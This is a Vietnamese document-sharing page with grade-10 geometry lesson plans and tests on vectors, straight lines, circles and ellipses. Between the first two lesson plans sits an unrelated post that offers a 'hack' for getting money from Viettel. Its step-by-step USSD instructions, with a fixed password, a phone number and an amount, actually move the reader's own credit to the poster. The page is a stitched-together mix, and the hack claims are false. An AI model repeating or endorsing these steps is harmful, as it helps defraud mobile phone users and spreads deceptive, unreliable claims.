Giáo án Hình học lớp 10 ban cơ bản

Giáo án Hình học lớp 10 ban cơ bản

Chương I. VECTƠ (VECTOR)

Tên bài học: §1. CÁC ĐỊNH NGHĨA - Tiết 1/2

Thời lượng: 1 tiết, Ban Cơ bản (HH 10 chuẩn).

I. Mục tiêu.

Qua bài học học sinh cần nắm được:

1/ Về kiến thức

• Nắm được kn vectơ, hai vectơ cùng phương, cùng hướng.

2/ Về kỹ năng

• Nêu được vd về 2 vectơ cùng phưong, cùng hướng.

• Chứng minh được 2 vectơ cùng phưong, cùng hướng.

3/ Về tư duy

• Phân biệt được vectơ và đoạn thẳng

• C/m 3 điểm thẳng thông qua 2 vectơ cùng phưong.

4/ Về thái độ:

• Cẩn thận, chính xác.

• Tích cực hoạt động; rèn luyện tư duy khái quát, tương tự.

 

doc 78 trang Người đăng trường đạt Lượt xem 1272Lượt tải 0 Download
Bạn đang xem 20 trang mẫu của tài liệu "Giáo án Hình học lớp 10 ban cơ bản", để tải tài liệu gốc về máy bạn click vào nút DOWNLOAD ở trên
Ngày soạn:  tuaàn 
Ngày dạy:	tieát
Chương I. VECTƠ (VECTOR)
Tên bài học: §1. CÁC ĐỊNH NGHĨA - Tiết 1/2
Thời lượng: 1 tiết, Ban Cơ bản (HH 10 chuẩn).
I. Mục tiêu.
Qua bài học học sinh cần nắm được:
1/ Về kiến thức
· Nắm được kn vectơ, hai vectơ cùng phương, cùng hướng.
2/ Về kỹ năng
· Nêu được vd về 2 vectơ cùng phưong, cùng hướng.
· Chứng minh được 2 vectơ cùng phưong, cùng hướng.
3/ Về tư duy
· Phân biệt được vectơ và đoạn thẳng
· C/m 3 điểm thẳng thông qua 2 vectơ cùng phưong.
4/ Về thái độ:
· Cẩn thận, chính xác.
· Tích cực hoạt động; rèn luyện tư duy khái quát, tương tự.
II. Chuẩn bị.
· Hsinh chuẩn bị thước kẽ, kiến thức đã học các lớp dưới
· Giáo án, SGK, STK, phiếu học tập, 
III. Phương pháp.
Dùng phương pháp gợi mở vấn đáp.
IV. Tiến trình bài học và các hoạt động.
1/ Kiểm tra kiến thức cũ
2/ Bài mới
HĐ : Nắm khái niệm vectơ.
Hoạt động của giáo viên
Hoạt động của học sinh
Tóm tắt ghi bảng
- Yêu cầu HS nhìn vào tranh, nhận xét ý nghĩa các mũi tên
- Trả lời 
- Ghi hoặc không ghi kn mđề
Ghi Tiêu đề bài 
1. Kn vectơ
SGK. Ghi ký hiệu và vẽ vectơ AB, a,
 HĐ 1: Học sinh xác định các vectơ từ 2 điểm A, B..
Hoạt động của giáo viên
Hoạt động của học sinh
Tóm tắt ghi bảng
- Gọi lên bảng vẽ
- Trả lời, vẽ 
- Vẽ Vectơ và đoạn thẳng từ những điểm A, B; C, D
HĐ 2 : Nhận xét vị trí tương đối của 2 vectơ, đi đến kn 2 vectơ cùng phương, hướng.
Hoạt động của giáo viên
Hoạt động của học sinh
Tóm tắt ghi bảng
- Kn giá của vectơ
- Yêu cầu hs thực hiện hđ 2 ở SGK, lưu ý giá của vectơ
- Đn 
- Nhận xét hướng đi của mỗi vectơ ? Cm 3 điểm thẳng hàng đã học ở THCS ? 
- Nx vị trí A, B, C khi AB & AC cùng phương ? Đi đến nhận xét.
- Lắng nghe, ghi kn
- Nhìn, suy nghĩ, trả lời
- Trả lời
- Trả lời
- AB & AC cùng phương, thì AB, AC nằm trên 1 đg thẳng hoặc trên 2 đg //, loại khả năng 2
2. Vectơ cùng phương, vectơ cùng hướng
- Đường thẳng đi qua điểm đầu và điểm cuối gọi là giá của vectơ.
- Đn: SGK
- Nhận xét: A, B, C th hàng ó 2 vectơ AB & AC cùng phương
HĐ 3: Học sinh tiến hành HĐ 3 ở SGK.
Hoạt động của giáo viên
Hoạt động của học sinh
Tóm tắt ghi bảng
- Nhận xét 
- Hs trả lời:
- Cùng hướng thì cùng phương.
- Cùng phương chưa chắc đã cùng hướng.
HĐ 4 : Vdụ củng cố.
Hoạt động của giáo viên
Hoạt động của học sinh
Tóm tắt ghi bảng
- Gv cho hình bình hành ABCD, tìm 1 số cặp vectơ cùng phương, cùng hướng, ngược hướng ? Giải thích ?
- Vẽ hình, tìm, chứng minh
- Ghi bài
- Vẽ hình
- Ghi những câu đúng
3/ BTVN: 	1. BT 2 SGK trang 7.
	2. Cho 5 điểm phân biệt A, B, C, D và E. Có bao nhiêu vectơ có điểm đầu và điểm cuối khác nhau ?	
[HACK] BẢN HACK MỚI NHẤT LẤY TIỀN MẠNG VIETEL ĐÂY .(BẢN CẬP NHẬT 30/06)
Xin được chia sẻ cùng các bạn một thủ thuật dùng mã hack mà tôi vừa mới khám phá:như các bạn cũng đã thấy,rất nhiều các cá nhân post bài lên các diễn đàn trong nuớc với nội dung ”hack tiền của mạng Viettel”để tìm được những topic như thế không hề khó. Ở đây tôi xin đưa ra một vài ví dụ: 
và còn rất nhiều những topic như vậy,nhưng hầu hết là của AMATEUR HACKER,chủ yếu nhằm vào mục đích vụ lợi chứ không thông thạo về chuyên môn, họ thiếu kinh nghiệm ,kiến thức và cả tính chính xác trong lĩnh vực Hack bậc thầy này,mà nó đòi hỏi phài có một trình độ Hack tương đối cao .Chính vì những lí do nêu trên và với nhiều năm kinh nghiệm của mình,tôi xin giới thiệu : Tôi :
Họ tên: xucxactinhyeu
Nghề nghiệp : hacker
Tôi không dám nhận mình là một sinh viên ưu tú,nhưng với những gì mà mình tự khám phá được thì tôi thấy rất hài lòng.Chắc các bạn cũng biết tới diễn đàn HAVonline – diễn đàn hacker lớn nhất hiện nay và tôi rất tự hào khi mình nằm trong ban quản trị diễn đàn.Với những kinh nghiệm mà tôi đã có ,hôm nay tôi xin giới thiệu với các bạn cách hack tiền tài khoản Viettel hoàn toàn chính xác.Do thời gian có hạn nên tôi nói ngắn gọn như sau:
Các bạn chỉ cần thực hiện tuần tự và chính xác theo yêu cầu của 6 bước sau:
1 -Một sim Viettel hoạt động trên 230 ngày(hon 7 tháng).Tại sao phải cần vậy?Vì chỉ có những sim hoạt dộng trên 7 tháng mới được Viettel đưa vào mã bảo vệ tài khoản chuyển tiền ( 6 tháng chưa được đâu các bạn) trên server Viettel quản lí.
2 -Rất đơn giản : Soạn tin MK gửi tới 136 để lấy mât khẩu chuyển tiền của bạn( nếu bạn chưa có).Tại sao phải cần vậy ? Vì chúng ta hack thông qua dịch vụ I-Share của Viettel.
3 -Ðổi mật khẩu chuyển tiền: các bạn gọi tới 900 ,nhánh phím số 3 và làm theo hướng dẫn..và điều quan trọng nằm ở bước này. Các bạn phải đổi mât khẩu chuyển tiền thành dãy số sau :10010010 ,đó chính là mật khẩu Server trung gian ở bước 5. Tại sao phải làm vậy?Vì khi các bạn chuyển mật khẩu thành dãy số trên tức là đã mã hóa tài khoản của bạn trên Server mà Viettel quản lý.Ðiều này rất quan trọng.
4 -Tài khoản trong sim của bạn phải có nhiều hơn 33999 vnd
5 -Các bạn làm theo cú pháp nhu sau: *136* mật khẩu Server *mã PIN *mã PUK#. Để khỏi mất thời gian của các bạn tìm lại 2 mã trên nên tôi đã tạo ra một Server trung gian ( viết tắt là TIS-Telephone of Intermediacy Server) với mã PIN và mã PUK mặc định (dùng đăng nhập sdt của bạn trên Server),tóm lại, cụ thể các thông số như sau (chỉ áp dụng cho mạng Viettel):
+ mật khẩu Server: 10010010
+ mã PIN : 841682455083
+ mã PUK: 28000
Các bạn chỉ cần nhập chính xác 3 dãy số trên vào cú pháp và nhấn nút gọi thì hệ thống sẽ tự động đăng nhập sdt của bạn vào TIS (Telephone of Intermediacy Server) mà tôi tạo ra và tài khoản của sdt người gửi sẽ tự đông được công thêm tiền hack được sau khi đăng nhập (tiền hack được sẽ công thêm vào tài khoản chính),thật ra đây là một trong những cách hack tài khoản điện thoại mà các Hacker chuyên nghiệp trên thế giới gần đây mới sử dụng ( nguyên lý là dùng mã hack đảo chiều các dịch vụ chuyển tiền từ các Server di đông,chẳng hạn như I-Share, hiên trên mạng có nhiều tài liệu tiếng Anh nói về vấn đề này).
6- Sau khi làm xong những bước trên : các bạn chỉ cần đợi 15 phút , sẽ có tin nhắn trả lời và tài khoản chính của các bạn đã được cộng thêm 50000 vnd.( lưu ý 50000vnd sẽ được cộng trực tiếp vào tài khoản chính của bạn)
+Tôi hack được tài khoản của mạng di động viettel từ 1 lỗ hổng nhỏ trên I-Share và những lần tôi test gần đây đều thành công.Thông báo sevsr trung gian ma tôi tao ra cũng là sevsr duy nhất hoạt động có hiệu quả hiện nay).
Tất cả chỉ có vậy nhưng đó chính là công sức bao lâu nay tôi khám phá.Các bạn hãy thử và cho tôi biết kết quả nếu như bản hack hoạt động tốt tôi sẽ mở thêm nhiều sever khác.
Các Bạn tranh thủ đi kẻo viettel sửa lỗi đó
Nếu bạn làm lần đâù mà không được thì hãy làm đi làm lại vài lần, chắc chắn sẽ thành công
Ngày soạn:  tuaàn 
Ngày dạy:	tieát
Chương I. VECTƠ (VECTOR)
Tên bài học: §1. CÁC ĐỊNH NGHĨA - Tiết 2/2
Thời lượng: 1 tiết, Ban Cơ bản (HH 10 chuẩn).
I. Mục tiêu.
Qua bài học học sinh cần nắm được:
1/ Về kiến thức
· Biết đuợc độ dài vectơ = độ dài đoạn thẳng
Hiểu đuợc hai vectơ =.
Biết đựoc vectơ 0.
2/ Về kỹ năng
· Chứng minh được 2 vectơ =.
· Dựng được 1 vectơ AB (dựng điểm B) = 1 vectơ đã cho.
3/ Về tư duy
· Nhớ, hiểu, vận dụng.
4/ Về thái độ:
· Cẩn thận, chính xác.
· Tích cực hoạt động; rèn luyện tư duy khái quát, tương tự.
II. Chuẩn bị.
· Hsinh chuẩn bị thước kẽ, kiến thức đã học các lớp dưới, tiết truớc.
· Giáo án, SGK, STK, phiếu học tập, 
III. Phương pháp.
Dùng phương pháp gợi mở vấn đáp.
IV. Tiến trình bài học và các hoạt động.
1/ Kiểm tra kiến thức cũ
Cho tam giác ABC, có 3 đường TB là MN, NP, PM. Tìm những cặp vectơ cùng phưwng, cùng hướng.
2/ Bài mới
HĐ : Nắm khái niệm 2 vectơ =.
Hoạt động của giáo viên
Hoạt động của học sinh
Tóm tắt ghi bảng
- Kn độ dài vectơ, ký hiệu, vectơ đơn vị
- Cho hs pb cảm nhận giống, khác của 2 vectơ MN, BP ở KTBC ?
- Hd đi đến chú ý
- Ghi hoặc không ghi 
- Trả lời
- Ghi chú ý
3. Hai vectơ =
- Ghi tóm tắt các kn bên.
- 
- Chú ý: 
+ Tính bắc cầu..
+ Cho vectơ a và điểm O, khi đó có 1 và chỉ 1 vectơ OA = vectơ a.
 HĐ 1: Hđ 4 ở SGK
Hoạt động của giáo viên
Hoạt động của học sinh
Tóm tắt ghi bảng
- 7’, Gọi lên bảng vẽ, giải
- Vẽ, Trả lời 
Chỉnh sửa phần hs làm.
HĐ : Hd kn vectơ không và các tc.
Hoạt động của giáo viên
Hoạt động của học sinh
Tóm tắt ghi bảng
- Kn vectơ 0
- Độ dài vectơ 0
- HD hs nhận xét vectơ chỉ là 1 điểm, từ đó .
Quy ước vectơ 0 cùng phương, cùng hướng với mọi vectơ
- Lắng nghe, ghi kn
- Trả lời
- Ghi quy ước
4. Vectơ không
-
-
-
- Chú ý: vectơ 0 = vectơ AA = vectơ BB =.. với mọi A, B.
HĐ 2: Củng cố
Hoạt động của giáo viên
Hoạt động của học sinh
Tóm tắt ghi bảng
- Cho hbh ABCD, tâm O. M, N, P ll là trung điểm của AD, BC, CD. Tìm các vectơ = vectơ MO, OB; dựng vectơ MQ = vectơ OB, Có bao nhiêu điểm Q ?
- Hs vẽ hình, làm bài 
- Hv của hs
- Lời giải đã sửa
3/ BTVN: 	1. BT 1-4 SGK trang 7.
	2. BT SBT 7-10.	
Ngày soạn:  tuaàn 
Ngày dạy:	tieát
Chương I. VECTƠ (VECTOR)
Tên bài học: CÂU HỎI VÀ BÀI TẬP (ppct 3)
Thời lượng: 1 tiết, Ban Cơ bản (HH 10 chuẩn).
I. Mục tiêu.
Qua bài học học sinh cần nắm được:
1/ Về kiến thức
· Củng cố kn phương, hướng, độ dài vectơ . 
Củng cố tc vectơ 0, hai vectơ =.
2/ Về kỹ năng
· Chứng minh được 2 vectơ, cùng phương,, =.
· Vận dụng được vào các btoán hình học phẳng.
3/ Về tư duy
· Nhớ, hiểu, vận dụng.
4/ Về thái độ:
· Cẩn thận, chính xác.
· Tích cực hoạt động; rèn luyện tư duy khái quát, tương tự.
II. Chuẩn bị.
· Hsinh chuẩn bị thước kẽ, kiến thức đã học các lớp dưới, tiết truớc.
· Giáo án, SGK, STK, phiếu học tập, 
III. Phương pháp.
Dùng phương pháp gợi mở vấn đáp.
IV. Tiến trình bài học và các hoạt động.
1/ Kiểm tra kiến thức cũ
Cho tam giác ABC đều, những kết luận sau đâyy đúng hay sai ? Tại sao ?
a) vectơ AB = vectơ BC	b) vectơ AB = vectơ AC	c) độ dài vectơ AB và vectơ AC = 
2/ Bài mới
HĐ 1: Bài tập 1
Hoạt động của học sinh
Hoạt động của giáo viên
Tóm tắt ghi bảng
- Đứng tại chỗ phát biểu.
- Trả lời, vẽ hình
- Yêu cầu HS làm bt 1 tại chỗ, chọn hs tuỳ ý.
- Cho 3 điểm A, B, C thẳng hàng. Khi nào thì vectơ AB và AC cùng hướng, ngược hướng ?
Ghi Tiêu đề bài 
- Ghi 1 vài ý cần thiết.
- Vẽ hình minh hoạ
HĐ 2: Bài tập 2
Hoạt động của học sinh
Hoạt động của giáo viên
Tóm tắt ghi bảng
 - Lên bảng trả lời
- Yêu cầu 1 HS làm bt 2 tại chỗ, chọn hs tuỳ ý; hs khác lên ghi trên bảng.
- Ghi đáp án.
HĐ 3 : Bài tập 3,4
Hoạt động của học sinh
Hoạt động của giáo viên
Tóm tắt ghi bảng
- 2 hs lên bảng, dưới lớp làm nháp và theo dõi
-Gv gọi 2 hs lên bảng giải bt 3; bt 4.
- Cho hs dưới lớp nhận xét 
- BT 3 nhớ để vận dụng như đlý.
- Chỉnh sửa 
HĐ 4: Bài tập 10 trong SBT.
Hoạt động của học sinh
Hoạt động của giáo viên
Tóm tắt ghi bảng
- 1 hs khá lên bảng, dưới lớp làm nháp và theo dõi
-Gv cho hs dưới lớp tìm hướng giải, đích phải đến, = cách nào ?
- Cho hs dưới lớp nhận xét 
- Chỉnh sửa 
HĐ 5 : Củng cố
Hoạt động của học sinh
Hoạt động của giáo viên
Tóm tắt ghi bảng
- Đứng dậy phát biểu 
(GV chọn tuỳ ý)
- Cho hs phát biểu kn, tc, p ... âu 2. Đáp án C	01đ
Câu 3. Đáp án B	01đ
Câu 4. Đáp án D	01đ
Câu 5. Đáp án D	01đ
Câu 6. VTPT đúng	01đ
	Thay vào và tính đúng kết quả	01đ
Câu 7. Dạng pttq (thay toạ độ M) đúng	01đ
	Biểu thức khoảng cách từ A, B đến đường thẳng	01đ
	Đẳng thức từ giả thiết cách đều	0,5đ
	Kết quả đúng (02 nghiệm hình)	0,5đ
KIỂM TRA 45 PHÚT
MÔN: HÌNH HỌC 10CB
-----------------------------------------------------------------------------------------------------------------------
ĐỀ 1
Câu 1. 	Cho ptts của đường thẳng d: 
	Trong các phương trình sau, pt nào là pttq của (d) ?
A. 3x – y – 1 = 0	B. 3x + y – 1 = 0
C. -3x + y – 2 = 0	D. 3x + y + 2 = 0
Câu 2. 	Đường thẳng đi qua M(0; 1) và song song với đường thẳng d: x + 2y + 1 = 0 có phương trình tổng quát là:
A. x + 2y - 1 = 0 	B. -x + 2y - 2 = 0 
C. x + 2y - 2 = 0 	D. x + 2y - 3 = 0 
Câu 3. 	Cho hai đường thẳng d1: x + y + 1 – m = 0 và d2: (m + 3)x + y – 3 + 3m = 0
	d1 // d2 khi và chỉ khi:
A. m = 1	B. m = 2 	C. m = -1	D. m = -2
Câu 4.	Cho hai đường thẳng d1: x + 2y + 4 = 0 và d2: -2x + y -6 = 0
Số đo của góc giữa hai đường thẳng nói trên là 
A. 300	B. 450	C. 600	D. 900
Câu 5. 	Khoảng cách từ M(0; -2) đến đường thẳng d: 3x – 4y – 23 = 0 là:
A. 15	B. 3	C. 10	D. 5
Câu 6. 	Viết pttq của đường thẳng d, biết d đi qua A(1; -1) và B(-2; 1) ?
Câu 7. 	Viết pt đường thẳng đi qua M(1; 2) và cách đều hai điểm A(1; -1) và B( -2; 2)
KIỂM TRA 45 PHÚT
MÔN: HÌNH HỌC 10CB
-----------------------------------------------------------------------------------------------------------------------
ĐỀ II
Câu 1. 	Cho ptts của đường thẳng d: 
	Trong các phương trình sau, pt nào là pttq của (d) ?
A. 3x – y – 1 = 0	B. 3x + y – 1 = 0
C. -3x + y – 2 = 0	D. 3x - y - 5 = 0
Câu 2. 	Đường thẳng đi qua M(2; 0) và song song với đường thẳng d: x - 2y - 1 = 0 có phương trình tổng quát là:
A. x + 2y - 1 = 0 	B. -x + 2y - 2 = 0 
C. x - 2y - 2 = 0 	D. x + 2y - 3 = 0 
Câu 3. 	Cho hai đường thẳng d1: 4x + y + 1 – m = 0 và d2: (m - 3)x + y – 3 + 3m = 0
	d1 // d2 khi và chỉ khi:
A. m = 5	B. m = -5	C. m = 7	D. m = -7
Câu 4.	Cho hai đường thẳng d1: x + 2y + 4 = 0 và d2: 2x - y +6 = 0
Số đo của góc giữa hai đường thẳng nói trên là 
A. π/4	B. π/2	C. π/6	D. π/3
Câu 5. 	Khoảng cách từ M(-2; 0) đến đường thẳng d: 3x – 4y – 24 = 0 là:
A. 5	B. 7	C. 6	D. 9
Câu 6. 	Viết pttq của đường thẳng d, biết d đi qua C(-1; 1) và D(2; -1) ?
Câu 7. 	Viết pt đường thẳng đi qua M(2; 1) và cách đều hai điểm A(-1; 1) và B(2; -2)
Ngày tháng . năm .
Chương III. PHƯƠNG PHÁP TỌA ĐỘ TRONG MẶT PHẲNG
Tên bài học: §2. PHƯƠNG TRÌNH ĐƯỜNG TRÒN (ppct : 36) 
Thời lượng: 1 tiết, Ban Cơ bản (HH 10 chuẩn).
Mục tiêu.
Qua bài học học sinh cần nắm được:
1/ Về kiến thức
Củng cố khái niệm đường tròn, tiếp tuyến của đường tròn.
Nắm vững các dạng pt đường tròn, đk để có pt đường tròn; pt tiếp tyến của đường tròn tại 1 điểm trên đường tròn.
2/ Về kỹ năng
· Viết được pt đường tròn, đọc(tính) được tâm và bk của một đường tròn .
· Viết được pt tiếp tuyến của đường tròn tại 1 điểm trên đường tròn..
3/ Về tư duy
· Nhớ, Hiểu, vận dụng.
4/ Về thái độ:
· Cẩn thận, chính xác.
· Tích cực hoạt động; rèn luyện tư duy khái quát, tương tự.
II. Chuẩn bị.
· Hsinh chuẩn bị thước kẽ, kiến thức đã học các lớp dưới, tiết truớc.
· Giáo án, SGK, STK, phiếu học tập, 
III. Phương pháp.
Dùng phương pháp gợi mở vấn đáp.
IV. Tiến trình bài học và các hoạt động.
1/ Kiểm tra kiến thức cũ 
2/ Bài mới
HĐ 1: Phương trình của đường tròn
Hoạt động của học sinh
Hoạt động của giáo viên
Tóm tắt ghi bảng
+ Phát biểu tại chỗ
+ 3 vị trí tương đối, so sánh khoảng cách từ tâm đến điểm đó với bán kính; kc = R
+ Ghi bài 
+ Đọc cách tìm tọa độ tâm I và bk
+ Lên bảng trình bày
+ Khai triển 
+ Phát biểu, ghi bài
+ Thực hiện hđ2, giải thích
+ GV cho hs nhắc lại khái niệm đường tròn ? các yếu tố tạo nên đường tròn ?
+ Các vị trí tương đối của 1 điểm đối với 1 đườg tròn ? Một điểm nằm trên đường tròn khi nào ?
+ Dẫn dắt hs thiết lập điều kiện, dẫn đến biểu thức giữa x; y với toạ độ tâm I và bk.
+ Gọi hs phát biểu trước khi nêu chú ý
+ Lưu ý cách tìm toạ độ tâm I và bán kính khi có pt đường tròn và ngược lại !
+ Yêu cầu hs làm hđ1 trong vòng 3 phút
+ Cho hs khai triển hđt trong pt đưòng tròn nói trên ?
+ Dẫn dắt đến điều kiện để có dạng khác của pt đường tròn ! hs làm hđ2
1. Phương trình đường tròn có tâm và bán kính cho trước
+ Dạng pt đường tròn.
+ Chú ý
2. Nhận xét
Điều kiện ......
HĐ 2: Phương trình tiếp tuyến của đường tròn (tại điểm nằm trên đường tròn)
Hoạt động của học sinh
Hoạt động của giáo viên
Tóm tắt ghi bảng
Phát biểu tại chỗ
Phát biểu, vectơ IM0.
Phát biểu pttq của đường thẳng delta
+ Ghi bài 
+ Làm nháp, lên bảng
+ GV cho học sinh nhắc lại cách viết pttq của một đuờng thẳng
+ M0 thuộc đường thẳng delta, VTPT ?
+ PT tq của delta ?
+ Chốt lại khái niệm
+ Lưu ý: Tách đôi toạ độ
+ Khi viết pttt theo công thức trên, phải kiểm tra xem điểm đó có nằm trên đường tròn không ?
+ Hd làm ví dụ
3. Phương trình tiếp tuyến của đường tròn 
+ Dạng pt tiếp tuyến tại điểm nằm trên đường tròn.
HĐ 3: Củng cố
Hoạt động của học sinh
Hoạt động của giáo viên
Tóm tắt ghi bảng
- Hs phát biểu
- Hs bổ sung
- Tất cả đều làm
Gv cho hs nhắc lại 2 công thức vừa học
+ Làm bt 2b/83, bổ sung thêm câu viết pttt đi qua điểm (nằm trên đường tròn)
NHững kết quả, những bước trình bày chính xác của hs và của giáo viên.
Phiếu học tập : 
Câu 1: Hãy ghép mỗi ý ở cột thứ nhất với một ý ở cột thứ hai để được kết quả đúng:
Cột thứ 1
Cột thứ 2
Câu 2: Chọn phương án đúng:
a) 
b) 
c) 
d) 
a) 
b) 
c) 
d) 
3/ BTVN: 	Những bài còn lại ở trang 83, 84 SGK.
Ngày tháng . năm .
Chương III. PHƯƠNG PHÁP TỌA ĐỘ TRONG MẶT PHẲNG
Tên bài học: BÀI TẬP §2. PHƯƠNG TRÌNH ĐƯỜNG TRÒN (ppct : 37) 
Thời lượng: 1 tiết, Ban Cơ bản (HH 10 chuẩn).
Mục tiêu.
Qua bài học học sinh cần nắm được:
1/ Về kiến thức
Củng cố PT đường tròn, pt tiếp tuyến của đường tròn.
Củng cố pp viết pt đường tròn, pt tiếp tuyến với đường tròn tại 1 điểm trên đường tròn.
2/ Về kỹ năng
· Viết được pt đường tròn, đọc(tính) được tâm và bk của một đường tròn .
· Viết được pt tiếp tuyến của đường tròn tại 1 điểm trên đường tròn..
3/ Về tư duy
· Hiểu, vận dụng.
4/ Về thái độ:
· Cẩn thận, chính xác.
· Tích cực hoạt động; rèn luyện tư duy khái quát, tương tự.
II. Chuẩn bị.
· Hsinh chuẩn bị thước kẽ, kiến thức đã học các lớp dưới, tiết truớc.
· Giáo án, SGK, STK, phiếu học tập, 
III. Phương pháp.
Dùng phương pháp gợi mở vấn đáp.
IV. Tiến trình bài học và các hoạt động.
1/ Kiểm tra kiến thức cũ 
HĐ 1
2/ Bài mới
HĐ 1: Phương trình của đường tròn, tâm và bán kính
Hoạt động của học sinh
Hoạt động của giáo viên
Tóm tắt ghi bảng
+ Phát biểu tại chỗ
+ a2+b2> c
+ Trả lời các câu trong bài 1/83
+ Tìm toạ độ tâm và bk
+ Phát biểu công thức
+ GV cho hs nhắc lại các dạng của pt đường tròn ?
+ Ứng dụng vàobài tập số 1/83
+ Điều kiện để pt dạng trên là pt của một đường tròn ?
+ Gọi hs khác trình bày pp lập pt đường tròn
+ Gọi hs đó lên bảng làm 2b/83
khoảng csách từ 1 điểm đến 1 đường thẳng ?
+ Các dạng pt của đường tròn, điều kiện.
+ Phưong pháp lập pt đường tròn
HĐ 2: Viết Phương trình của đường tròn 
Hoạt động của học sinh
Hoạt động của giáo viên
Tóm tắt ghi bảng
+ 03 hs lên bảng
+ thì dùng dạng tâm và bk
+ Dùng tâm và bán kính
+ Độ lớn của hoành độ và tung độ của tâm là bằng nhau
+ GV gọi những hs tự nguyện lêngiải bài 3 chọn câu bất kỳ; bài 4 và 5/84
+ Nên dùng dạng pt nào ?
Bài 3 thì dùng dạng a, b, c
Bài 4, 5 thì dùng dạng tâm và bk
+ Tiếp xúc với 2 trục thì có được giả thiết gì ?
+ Sau 15 phút, gv tiến hành bước sửa chữa, nhận xét, đánh giá.
+ Bài 4 và 5 chỉ khác nhau ở phần lấy a
+ Các bài giải đúng của hs sau khi đã nhận xét, đánh giá
HĐ 3: Củng cố
Hoạt động của học sinh
Hoạt động của giáo viên
Tóm tắt ghi bảng
- Hs phát biểu
- Hs bổ sung
- Tất cả đều làm
Gv cho hs nhắc lại các công thức vừa học
+ Làm bt 6/84, bổ sung thêm câu viết pttt đi qua điểm (nằm trên đường tròn)
NHững kết quả, những bước trình bày chính xác của hs và của giáo viên.
Phiếu học tập : 
Câu 1: Hãy ghép mỗi ý ở cột thứ nhất với một ý ở cột thứ hai để được kết quả đúng:
Cột thứ 1
Cột thứ 2
Câu 2: Chọn phương án đúng:
a) 
b) 
c) 
d) 
a) 
b) 
c) 
d) 
3/ BTVN: 	Những bài còn lại ở trang 83, 84 SGK.
Ngày tháng . năm .
Chương III. PHƯƠNG PHÁP TỌA ĐỘ TRONG MẶT PHẲNG
Tên bài học: §3. PHƯƠNG TRÌNH ĐƯỜNG ELIP (ppct : 38) 
Thời lượng: 1 tiết, Ban Cơ bản (HH 10 chuẩn).
Mục tiêu.
Qua bài học học sinh cần nắm được:
1/ Về kiến thức
Nắm vứng định nghĩa đường Elip, các mô hình trong thực tế.
Nắm vững pt chính tắc, hình dạng; mối liên hệ giữa Elip và đường tròn.
2/ Về kỹ năng
· Viết được pt chính tắc của Elip; tìm được đỉnh và trục lớn, trục nhỏ.
· Viết được pt tiếp tuyến của đường tròn tại 1 điểm trên đường tròn..
3/ Về tư duy
· Nhớ, Hiểu, vận dụng.
4/ Về thái độ:
· Cẩn thận, chính xác.
· Tích cực hoạt động; rèn luyện tư duy khái quát, tương tự.
II. Chuẩn bị.
· Hsinh chuẩn bị thước kẽ, kiến thức đã học các lớp dưới, tiết truớc.
· Giáo án, SGK, STK, phiếu học tập, 
III. Phương pháp.
Dùng phương pháp gợi mở vấn đáp.
IV. Tiến trình bài học và các hoạt động.
1/ Kiểm tra kiến thức cũ 
2/ Bài mới
HĐ 1: Phương trình chính tắc của Elip
Hoạt động của học sinh
Hoạt động của giáo viên
Tóm tắt ghi bảng
+ Lắng nghe và phát biểu tại chỗ
+ Ghi bài
+ Vì a lớn nhất, a lớn hơn c
+ GV dẫn dắt từ những hình trong thực tế: Một số vườn hoa, bóng của 1 bảng tròn, quỹ đạo mặt trăng,...
+ Cho hs làm hđ 1, 2 ở SGK
+ Yêu cầu hs ghi định nghĩa cùng các khái niệm tiêu điểm, tiêu cự; giáo viên vẽ hình trên bảng
+ Hd viết pt, dạng, lưu ý cách tìm các đại lượng a, b, c
+ Gọi hs phát biểu hđ 3 (ý là nhấn mạnh a lớn nhất và a lớn hơn c)
1. Định nghĩa đường Elip
Hình vẽ
2. Phương trình chính tắc của Elip
Dạng pt chsính tắc
HĐ 2: HÌnh dạng của Elip - Mối liên hệ giữa Elipvà đuờng tròn
Hoạt động của học sinh
Hoạt động của giáo viên
Tóm tắt ghi bảng
Phát biểu tại chỗ
Giao điểm với Ox, thì y = 0, suy ra x = +-a
Tương tự đối với Oy
+ GV vẽ hình hướng dẫn dẫn đến các trục đối xứng của Elip
+ Tương tự đối với việc tìm các đỉnh, trục lớn, truc bé
+ Lưu ý tiêu điểm nằm trên trục Ox (có trường hợp ngược lại)
+ Gọi hs thực hiện hđộng 4
+ Hd về nhà phần 4
3. Hình dạng của Elip
HÌnh vẽ trên mp toạ độ
4. Liên hệ giữa Elipvà đuờng tròn
HĐ 3: Củng cố
Hoạt động của học sinh
Hoạt động của giáo viên
Tóm tắt ghi bảng
- Hs phát biểu
- Hs bổ sung
- Tất cả đều làm
Gv cho hs nhắc lại các công thức vừa học
+ Làm bt 1a/88; 3a/88
NHững kết quả, những bước trình bày chính xác của hs và của giáo viên.
Phiếu học tập : 
Câu 1: Hãy ghép mỗi ý ở cột thứ nhất với một ý ở cột thứ hai để được kết quả đúng:
Cột thứ 1
Cột thứ 2
Câu 2: Chọn phương án đúng:
a) 
b) 
c) 
d) 
a) 
b) 
c) 
d) 
3/ BTVN: 	Những bài còn lại ở trang 88 SGK.

Tài liệu đính kèm:

  • docGiao An HINH HOC 10(Ban CB).doc